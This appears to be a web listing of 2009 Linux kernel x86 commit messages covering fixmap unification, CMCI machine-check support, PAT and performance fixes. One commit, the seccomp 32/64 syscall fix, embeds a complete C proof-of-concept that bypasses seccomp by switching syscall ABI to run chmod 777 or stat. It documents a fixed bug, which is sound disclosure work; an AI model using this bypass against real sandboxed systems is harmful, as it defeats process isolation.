kernel-fxtec-pro1x

Author	SHA1	Message	Date
Ingo Molnar	caab36b593	Merge branch 'x86/mce2' into x86/core	2009-03-05 21:49:25 +01:00
Ingo Molnar	a1413c89ae	Merge branch 'x86/urgent' into x86/core Conflicts: arch/x86/include/asm/fixmap_64.h Semantic merge: arch/x86/include/asm/fixmap.h Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-05 21:48:50 +01:00
Daniel Glöckner	ab9e18587f	x86, math-emu: fix init_fpu for task != current Impact: fix math-emu related crash while using GDB/ptrace init_fpu() calls finit to initialize a task's xstate, while finit always works on the current task. If we use PTRACE_GETFPREGS on another process and both processes did not already use floating point, we get a null pointer exception in finit. This patch creates a new function finit_task that takes a task_struct parameter. finit becomes a wrapper that simply calls finit_task with current. On the plus side this avoids many calls to get_current which would each resolve to an inline assembler mov instruction. An empty finit_task has been added to i387.h to avoid linker errors in case the compiler still emits the call in init_fpu when CONFIG_MATH_EMULATION is not defined. The declaration of finit in i387.h has been removed as the remaining code using this function gets its prototype from fpu_proto.h. Signed-off-by: Daniel Glöckner <dg@emlix.com> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Cc: "Pallipadi Venkatesh" <venkatesh.pallipadi@intel.com> Cc: Arjan van de Ven <arjan@infradead.org> Cc: Bill Metzenthen <billm@melbpc.org.au> LKML-Reference: <E1Lew31-0004il-Fg@mailer.emlix.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-04 20:33:16 +01:00
Huang Ying	dd39ecf522	x86: EFI: Back efi_ioremap with init_memory_mapping instead of FIX_MAP Impact: Fix boot failure on EFI system with large runtime memory range Brian Maly reported that some EFI system with large runtime memory range can not boot. Because the FIX_MAP used to map runtime memory range is smaller than run time memory range. This patch fixes this issue by re-implement efi_ioremap() with init_memory_mapping(). Reported-and-tested-by: Brian Maly <bmaly@redhat.com> Signed-off-by: Huang Ying <ying.huang@intel.com> Cc: Brian Maly <bmaly@redhat.com> Cc: Yinghai Lu <yinghai@kernel.org> LKML-Reference: <1236135513.6204.306.camel@yhuang-dev.sh.intel.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-04 19:20:16 +01:00
H. Peter Anvin	2e22ea7cea	Merge branch 'x86/core' into x86/mce2	2009-03-03 21:05:42 -08:00
Jeremy Fitzhardinge	4e8304758c	x86: remove vestigial fix_ioremap prototypes The function seems to have disappeared at some point, leaving some vestigial prototypes behind... Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-04 02:29:32 +01:00
Ingo Molnar	91d75e209b	Merge branch 'x86/core' into core/percpu	2009-03-04 02:29:19 +01:00
Ingo Molnar	8b0e5860cb	Merge branches 'x86/apic', 'x86/cpu', 'x86/fixmap', 'x86/mm', 'x86/sched', 'x86/setup-lzma', 'x86/signal' and 'x86/urgent' into x86/core	2009-03-04 02:22:31 +01:00
Pekka Enberg	867c5b5292	x86: set_highmem_pages_init() cleanup Impact: cleanup This patch moves set_highmem_pages_init() to arch/x86/mm/highmem_32.c. The declaration of the function is kept in asm/numa_32.h because asm/highmem.h is included only if CONFIG_HIGHMEM is enabled so we can't put the empty static inline function there. Signed-off-by: Pekka Enberg <penberg@cs.helsinki.fi> LKML-Reference: <1236082212.2675.24.camel@penberg-laptop> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-03 13:13:15 +01:00
Roland McGrath	5b1017404a	x86-64: seccomp: fix 32/64 syscall hole On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. / #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char *argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>	2009-03-02 15:41:30 -08:00
Jeremy Fitzhardinge	9976b39b50	xen: deal with virtually mapped percpu data The virtually mapped percpu space causes us two problems: - for hypercalls which take an mfn, we need to do a full pagetable walk to convert the percpu va into an mfn, and - when a hypercall requires a page to be mapped RO via all its aliases, we need to make sure its RO in both the percpu mapping and in the linear mapping This primarily affects the gdt and the vcpu info structure. Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Cc: Xen-devel <xen-devel@lists.xensource.com> Cc: Gerd Hoffmann <kraxel@redhat.com> Cc: Rusty Russell <rusty@rustcorp.com.au> Cc: Tejun Heo <htejun@gmail.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-02 12:58:19 +01:00
Jeremy Fitzhardinge	2fb6b2a048	x86: add forward decl for tss_struct Its the correct thing to do before using the struct in a prototype. Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-02 12:07:49 +01:00
Jeremy Fitzhardinge	389d1fb11e	x86: unify chunks of kernel/process.c With x86-32 and -64 using the same mechanism for managing the tss io permissions bitmap, large chunks of process.c are trivially unifyable, including: - exit_thread - flush_thread - __switch_to_xtra (along with tsc enable/disable) and as bonus pickups: - sys_fork - sys_vfork (Note: asmlinkage expands to empty on x86-64) Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-02 12:07:48 +01:00
Jeremy Fitzhardinge	db949bba3c	x86-32: use non-lazy io bitmap context switching Impact: remove 32-bit optimization to prepare unification x86-32 and -64 differ in the way they context-switch tasks with io permission bitmaps. x86-64 simply copies the next tasks io bitmap into place (if any) on context switch. x86-32 invalidates the bitmap on context switch, so that the next IO instruction will fault; at that point it installs the appropriate IO bitmap. This makes context switching IO-bitmap-using tasks a bit more less expensive, at the cost of making the next IO instruction slower due to the extra fault. This tradeoff only makes sense if IO-bitmap-using processes are relatively common, but they don't actually use IO instructions very often. However, in a typical desktop system, the only process likely to be using IO bitmaps is the X server, and nothing at all on a server. Therefore the lazy context switch doesn't really win all that much, and its just a gratuitious difference from 64-bit code. This patch removes the lazy context switch, with a view to unifying this code in a later change. Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-02 12:07:48 +01:00
Ingo Molnar	f180053694	x86, mm: dont use non-temporal stores in pagecache accesses Impact: standardize IO on cached ops On modern CPUs it is almost always a bad idea to use non-temporal stores, as the regression in this commit has shown it: `30d697f`: x86: fix performance regression in write() syscall The kernel simply has no good information about whether using non-temporal stores is a good idea or not - and trying to add heuristics only increases complexity and inserts fragility. The regression on cached write()s took very long to be found - over two years. So dont take any chances and let the hardware decide how it makes use of its caches. The only exception is drivers/gpu/drm/i915/i915_gem.c: there were we are absolutely sure that another entity (the GPU) will pick up the dirty data immediately and that the CPU will not touch that data before the GPU will. Also, keep the _nocache() primitives to make it easier for people to experiment with these details. There may be more clear-cut cases where non-cached copies can be used, outside of filemap.c. Cc: Salman Qazi <sqazi@google.com> Cc: Nick Piggin <npiggin@suse.de> Cc: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-02 11:06:49 +01:00
Ingo Molnar	f5c1aa1537	Revert "gpu/drm, x86, PAT: PAT support for io_mapping_*" This reverts commit `17581ad812`. Sitsofe Wheeler reported that /dev/dri/card0 is MIA on his EeePC 900 and bisected it to this commit. Graphics card is an i915 in an EeePC 900: 00:02.0 VGA compatible controller [0300]: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller [8086:2592] (rev 04) ( Most likely the ioremap() of the driver failed and hence the card did not initialize. ) Reported-by: Sitsofe Wheeler <sitsofe@yahoo.com> Bisected-by: Sitsofe Wheeler <sitsofe@yahoo.com> Cc: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com> Cc: Suresh Siddha <suresh.b.siddha@intel.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-03-01 12:47:49 +01:00
Tejun Heo	d0c4f57027	bootmem, x86: further fixes for arch-specific bootmem wrapping Impact: fix new breakages introduced by previous fix Commit `c132937556` tried to clean up bootmem arch wrapper but it wasn't quite correct. Before the commit, the followings were broken. * Low level interface functions prefixed with __ ignored arch preference. * reserve_bootmem(...) can't be mapped into reserve_bootmem_node(NODE_DATA(0)->bdata, ...) because the node is not preference here. The region specified MUST fall into the specified region; otherwise, it will panic. After the commit, * If allocation fails for the arch preferred node, it should fallback to whatever is available. Instead, it simply failed allocation. There are too many internal details to allow generic wrapping and still keep things simple for archs. Plus, all that arch wants is a way to prefer certain node over another. This patch drops the generic wrapping around alloc_bootmem_core() and add alloc_bootmem_core() instead. If necessary, arch can define bootmem_arch_referred_node() macro or function which takes all allocation information and returns the preferred node. bootmem generic code will always try the preferred node first and then fallback to other nodes as usual. Breakages noted and changes reviewed by Johannes Weiner. Signed-off-by: Tejun Heo <tj@kernel.org> Acked-by: Johannes Weiner <hannes@cmpxchg.org>	2009-03-01 16:06:56 +09:00
Gustavo F. Padovan	c577b098f9	x86, fixmap: unify fixmap.h Impact: unification This patch unify fixmap_32.h and fixmap_64.h into fixmap.h. Things that we can't merge now are using CONFIG_X86_{32,64} (e.g.:vsyscall and EFI) Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br> Acked-by: Glauber Costa <gcosta@redhat.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-27 20:57:48 -08:00
Gustavo F. Padovan	c78f322ce8	x86, fixmap: prepare fixmap_32.h for unification Impact: cleanup Just prepare fixmap for later mechanic unification. No real modification on code. text data bss dec hex filename 3831152 353188 372736 4557076 458914 vmlinux-32.after 3831152 353188 372736 4557076 458914 vmlinux-32.before Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br> Acked-by: Glauber Costa <gcosta@redhat.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-27 20:57:48 -08:00
Gustavo F. Padovan	e365bcd921	x86, fixmap: prepare fixmap_64.h for unification Impact: cleanup Just prepare fixmap for later mechanic unification. No real modification on code. text data bss dec hex filename 4312362 527192 421924 5261478 5048a6 vmlinux-64.after 4312362 527192 421924 5261478 5048a6 vmlinux-64.before Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br> Acked-by: Glauber Costa <gcosta@redhat.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-27 20:57:48 -08:00
Gustavo F. Padovan	5f403fa9de	x86, fixmap: add CONFIG_EFI Impact: new fixmap allocation FIX_EFI_IO_MAP_FIRST_PAGE is used only when EFI is enabled. Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br> Acked-by: Glauber Costa <gcosta@redhat.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-27 20:57:47 -08:00
Gustavo F. Padovan	2ae38daf25	x86, fixmap: add CONFIG_X86_{LOCAL,IO}_APIC Impact: New fixmap allocations Add CONFIG_X86_{LOCAL,IO}_APIC to enum fixed_address. FIX_APIC_BASE is used only when CONFIG_X86_LOCAL_APIC is enabled and FIX_IO_APIC_BASE_* are used only when CONFIG_X86_IO_APIC is enabled. Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br> Acked-by: Glauber Costa <gcosta@redhat.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-27 20:57:47 -08:00
Gustavo F. Padovan	fd862dde18	x86, fixmap: define reserve_top_address for x86_64 Impact: new interface (not yet use) Define reserve_top_address for x86_64; only for later x86 integration. Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br> Acked-by: Glauber Costa <gcosta@redhat.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-27 20:57:47 -08:00
Gustavo F. Padovan	ab93e3c45d	x86, fixmap: define FIXADDR_BOOT_* and redefine FIX_ADDR_SIZE Impact: new interface, not yet used Now, with these macros, x86_64 code can know where start the permanent and non-permanent fixed mapped address. This patch make these macros equal fixmap_32.h for future x86 integration. Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br> Acked-by: Glauber Costa <gcosta@redhat.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-27 20:57:47 -08:00
Gustavo F. Padovan	d09375a9ec	x86, fixmap: rename __FIXADDR_SIZE and __FIXADDR_BOOT_SIZE Impact: rename Rename __FIXADDR_SIZE to FIXADDR_SIZE and __FIXADDR_BOOT_SIZE to FIXADDR_BOOT_SIZE. Signed-off-by: Gustavo F. Padovan <gustavo@las.ic.unicamp.br> Acked-by: Glauber Costa <gcosta@redhat.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-27 20:57:47 -08:00
Ingo Molnar	1f5bcabf1b	x86: apic: simplify secondary CPU wakeup methods Impact: cleanup - rename apic->wakeup_cpu to apic->wakeup_secondary_cpu, to make it apparent that this is an SMP-only method - handle NULL ->wakeup_secondary_cpus to mean the default INIT wakeup sequence - this allows simplification of the APIC driver templates. Cc: Yinghai Lu <yinghai@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-26 13:58:26 +01:00
Ingo Molnar	0917c01f8e	x86: remove update_apic from x86_quirks, fix Impact: build fix wakeup_secondary_cpu_via_init(), the default platform method for booting a secondary CPU, is always used on UP due to probe_32.c, if CONFIG_X86_LOCAL_APIC is enabled but SMP is off. So provide a UP wrapper inline as well. Cc: Yinghai Lu <yinghai@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-26 12:49:34 +01:00
Yinghai Lu	129d8bc828	x86: don't compile vsmp_64 for 32bit Impact: cleanup that is only needed when CONFIG_X86_VSMP is defined with 64bit also remove dead code about PCI, because CONFIG_X86_VSMP depends on PCI Signed-off-by: Yinghai Lu <yinghai@kernel.org> Cc: Ravikiran Thirumalai <kiran@scalex86.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-26 06:40:06 +01:00
Yinghai Lu	2b6163bf57	x86: remove update_apic from x86_quirks Impact: cleanup x86_quirks->update_apic() calling looks crazy. so try to remove it: 1. every apic take wakeup_cpu member directly 2. separate es7000_apic to es7000_apic_cluster 3. use uv_wakeup_cpu directly Signed-off-by: Yinghai Lu <yinghai@kernel.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-26 06:32:25 +01:00
Ingo Molnar	ecc25fbd6b	Merge branches 'x86/apic', 'x86/defconfig', 'x86/memtest', 'x86/mm' and 'linus' into x86/core	2009-02-26 06:31:32 +01:00
Ingo Molnar	801c0be814	Merge branches 'x86/urgent' and 'x86/pat' into x86/core Conflicts: arch/x86/include/asm/pat.h	2009-02-26 06:31:23 +01:00
Ingo Molnar	13b2eda64d	Merge branch 'x86/urgent' into x86/core Conflicts: arch/x86/mach-voyager/voyager_smp.c	2009-02-26 06:30:42 +01:00
Ingo Molnar	2e31add2a7	Merge branch 'x86/urgent' into x86/pat	2009-02-25 16:40:10 +01:00
Venkatesh Pallipadi	17581ad812	gpu/drm, x86, PAT: PAT support for io_mapping_* Make io_mapping_create_wc and io_mapping_free go through PAT to make sure that there are no memory type aliases. Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com> Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com> Cc: Dave Airlie <airlied@redhat.com> Cc: Jesse Barnes <jbarnes@virtuousgeek.org> Cc: Eric Anholt <eric@anholt.net> Cc: Keith Packard <keithp@keithp.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-25 13:09:52 +01:00
Venkatesh Pallipadi	4ab0d47d0a	gpu/drm, x86, PAT: io_mapping_create_wc and resource_size_t io_mapping_create_wc should take a resource_size_t parameter in place of unsigned long. With unsigned long, there will be no way to map greater than 4GB address in i386/32 bit. On x86, greater than 4GB addresses cannot be mapped on i386 without PAE. Return error for such a case. Patch also adds a structure for io_mapping, that saves the base, size and type on HAVE_ATOMIC_IOMAP archs, that can be used to verify the offset on io_mapping_map calls. Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com> Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com> Cc: Dave Airlie <airlied@redhat.com> Cc: Jesse Barnes <jbarnes@virtuousgeek.org> Cc: Eric Anholt <eric@anholt.net> Cc: Keith Packard <keithp@keithp.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-25 13:09:51 +01:00
Venkatesh Pallipadi	7880f74645	gpu/drm, x86, PAT: routine to keep identity map in sync Add a function to check and keep identity maps in sync, when changing any memory type. One of the follow on patches will also use this routine. Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com> Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com> Cc: Dave Airlie <airlied@redhat.com> Cc: Jesse Barnes <jbarnes@virtuousgeek.org> Cc: Eric Anholt <eric@anholt.net> Cc: Keith Packard <keithp@keithp.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-25 13:09:51 +01:00
Ingo Molnar	95108fa34a	x86: usercopy: check for total size when deciding non-temporal cutoff Impact: make more types of copies non-temporal This change makes the following simple fix: `30d697f`: x86: fix performance regression in write() syscall A bit more sophisticated: we check the 'total' number of bytes written to decide whether to copy in a cached or a non-temporal way. This will for example cause the tail (modulo 4096 bytes) chunk of a large write() to be non-temporal too - not just the page-sized chunks. Cc: Salman Qazi <sqazi@google.com> Cc: Nick Piggin <npiggin@suse.de> Cc: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-25 10:20:05 +01:00
Ingo Molnar	3255aa2eb6	x86, mm: pass in 'total' to __copy_from_user_nocache() Impact: cleanup, enable future change Add a 'total bytes copied' parameter to __copy_from_user_nocache(), and update all the callsites. The parameter is not used yet - architecture code can use it to more intelligently decide whether the copy should be cached or non-temporal. Cc: Salman Qazi <sqazi@google.com> Cc: Nick Piggin <npiggin@suse.de> Cc: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-25 10:20:03 +01:00
Ingo Molnar	95f66b3770	Merge branch 'x86/asm' into x86/mm	2009-02-25 08:27:46 +01:00
Tejun Heo	d325100504	x86: convert cacheflush macros inline functions Impact: cleanup Unused macro parameters cause spurious unused variable warnings. Convert all cacheflush macros to inline functions to avoid the warnings and achieve better type checking. Signed-off-by: Tejun Heo <tj@kernel.org>	2009-02-25 11:06:51 +09:00
H. Peter Anvin	638bee71c8	Merge branch 'x86/core' into x86/mce2	2009-02-24 16:11:51 -08:00
Andi Kleen	88ccbedd9c	x86, mce, cmci: add CMCI support Impact: Major new feature Intel CMCI (Corrected Machine Check Interrupt) is a new feature on Nehalem CPUs. It allows the CPU to trigger interrupts on corrected events, which allows faster reaction to them instead of with the traditional polling timer. Also use CMCI to discover shared banks. Machine check banks can be shared by CPU threads or even cores. Using the CMCI enable bit it is possible to detect the fact that another CPU already saw a specific bank. Use this to assign shared banks only to one CPU to avoid reporting duplicated events. On CPU hot unplug bank sharing is re discovered. This is done using a thread that cycles through all the CPUs. To avoid races between the poller and CMCI we only poll for banks that are not CMCI capable and only check CMCI owned banks on a interrupt. The shared banks ownership information is currently only used for CMCI interrupts, not polled banks. The sharing discovery code follows the algorithm recommended in the IA32 SDM Vol3a 14.5.2.1 The CMCI interrupt handler just calls the machine check poller to pick up the machine check event that caused the interrupt. I decided not to implement a separate threshold event like the AMD version has, because the threshold is always one currently and adding another event didn't seem to add any value. Some code inspired by Yunhong Jiang's Xen implementation, which was in term inspired by a earlier CMCI implementation by me. Signed-off-by: Andi Kleen <ak@linux.intel.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-24 13:41:00 -08:00
Andi Kleen	03195c6b40	x86, mce, cmci: define MSR names and fields for new CMCI registers Impact: New register definitions only CMCI means support for raising an interrupt on a corrected machine check event instead of having to poll for it. It's a new feature in Intel Nehalem CPUs available on some machine check banks. For details see the IA32 SDM Vol3a 14.5 Define the registers for it as a preparation for further patches. Signed-off-by: Andi Kleen <ak@linux.intel.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-24 13:41:00 -08:00
Andi Kleen	ee031c31d6	x86, mce, cmci: use polled banks bitmap in machine check poller Define a per cpu bitmap that contains the banks polled by the machine check poller. This is needed for the CMCI code in the next patches to be able to disable polling on specific banks. The bank by default contains all banks, so there is no behaviour change. Only future code will remove some banks from the polling set. Signed-off-by: Andi Kleen <ak@linux.intel.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-24 13:26:05 -08:00
Andi Kleen	b276268631	x86, mce, cmci: factor out threshold interrupt handler Impact: cleanup; preparation for feature The mce_amd_64 code has an own private MC threshold vector with an own interrupt handler. Since Intel needs a similar handler it makes sense to share the vector because both can not be active at the same time. I factored the common APIC handler code into a separate file which can be used by both the Intel or AMD MC code. This is needed for the next patch which adds an Intel specific CMCI handler. This patch should be a nop for AMD, it just moves some code around. Signed-off-by: Andi Kleen <ak@linux.intel.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-24 13:24:42 -08:00
Andi Kleen	41fdff322e	x86, mce, cmci: export MAX_NR_BANKS Impact: Cleanup (code movement) Move MAX_NR_BANKS into mce.h because it's needed there for followup patches. Signed-off-by: Andi Kleen <ak@linux.intel.com> Signed-off-by: H. Peter Anvin <hpa@zytor.com>	2009-02-24 13:24:42 -08:00
Ingo Molnar	0edcf8d692	Merge branch 'tj-percpu' of git://git.kernel.org/pub/scm/linux/kernel/git/tj/misc into core/percpu Conflicts: arch/x86/include/asm/pgtable.h	2009-02-24 21:52:45 +01:00
Ingo Molnar	a852cbfaaf	Merge branches 'x86/acpi', 'x86/apic', 'x86/asm', 'x86/cleanups', 'x86/mm', 'x86/signal' and 'x86/urgent'; commit 'v2.6.29-rc6' into x86/core	2009-02-24 21:50:43 +01:00
Cyrill Gorcunov	57e372932c	x86: invalid_vm86_irq -- use predefined macros Impact: cleanup Signed-off-by: Cyrill Gorcunov <gorcunov@openvz.org> Cc: heukelum@fastmail.fm Cc: Cyrill Gorcunov <gorcunov@openvz.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-24 18:08:39 +01:00
Salman Qazi	30d697fa3a	x86: fix performance regression in write() syscall While the introduction of __copy_from_user_nocache (see commit: `0812a579c9`) may have been an improvement for sufficiently large writes, there is evidence to show that it is deterimental for small writes. Unixbench's fstime test gives the following results for 256 byte writes with MAX_BLOCK of 2000: 2.6.29-rc6 ( 5 samples, each in KB/sec ): 283750, 295200, 294500, 293000, 293300 2.6.29-rc6 + this patch (5 samples, each in KB/sec): 313050, 3106750, 293350, 306300, 307900 2.6.18 395700, 342000, 399100, 366050, 359850 See w_test() in src/fstime.c in unixbench version 4.1.0. Basically, the above test consists of counting how much we can write in this manner: alarm(10); while (!sigalarm) { for (f_blocks = 0; f_blocks < 2000; ++f_blocks) { write(f, buf, 256); } lseek(f, 0L, 0); } Note, there are other components to the write syscall regression that are not addressed here. Signed-off-by: Salman Qazi <sqazi@google.com> Cc: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Ingo Molnar <mingo@elte.hu>	2009-02-24 17:16:36 +01:00

1 2 3 4 5 ...

685 commits